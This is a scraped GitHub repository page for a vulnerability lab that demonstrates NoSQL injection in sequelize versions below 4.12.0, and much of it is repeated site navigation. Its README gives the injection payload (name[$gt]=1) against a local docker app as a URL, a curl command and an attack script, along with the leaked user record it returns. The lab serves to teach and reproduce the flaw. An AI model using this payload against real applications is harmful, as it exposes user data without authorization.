NoSQL Injection @ sequelize

module : sequelize
version : <4.12.0
severity: high
type: nosql-injection

Installation

docker-compose up --build

Lunch Attack

Browser [open the browser and enter the following url]
http://localhost:8000/api/get_user?name[%24gt]=1
the response will be {"id":1,"uid":1,"name":"Doe","createdAt":"...","updatedAt":"..."}

OR

Curl [open the terminal and run the following]
curl http://localhost:8000/api/get_user?name[%24gt]=1
the response will be {"id":1,"uid":1,"name":"Doe","createdAt":"...","updatedAt":"..."}

OR

Bash [open the terminal in the root dir of this app and run the following]
bash attack.sh
the response will be {"id":1,"uid":1,"name":"Doe","createdAt":"...","updatedAt":"..."}

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
src		src
.dockerignore		.dockerignore
.gitignore		.gitignore
Dockerfile		Dockerfile
attack.sh		attack.sh
docker-compose.yml		docker-compose.yml
package-lock.json		package-lock.json
package.json		package.json
readme.md		readme.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

NoSQL Injection @ sequelize

Installation

Lunch Attack

Browser [open the browser and enter the following url]

OR

Curl [open the terminal and run the following]

OR

Bash [open the terminal in the root dir of this app and run the following]

About

Releases

Packages

Contributors 3

Languages

shieldfy-vulnerability-hub/nosql-injection-sequelize

Folders and files

Latest commit

History

Repository files navigation

NoSQL Injection @ sequelize

Installation

Lunch Attack

Browser [open the browser and enter the following url]

OR

Curl [open the terminal and run the following]

OR

Bash [open the terminal in the root dir of this app and run the following]

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 3

Languages

Packages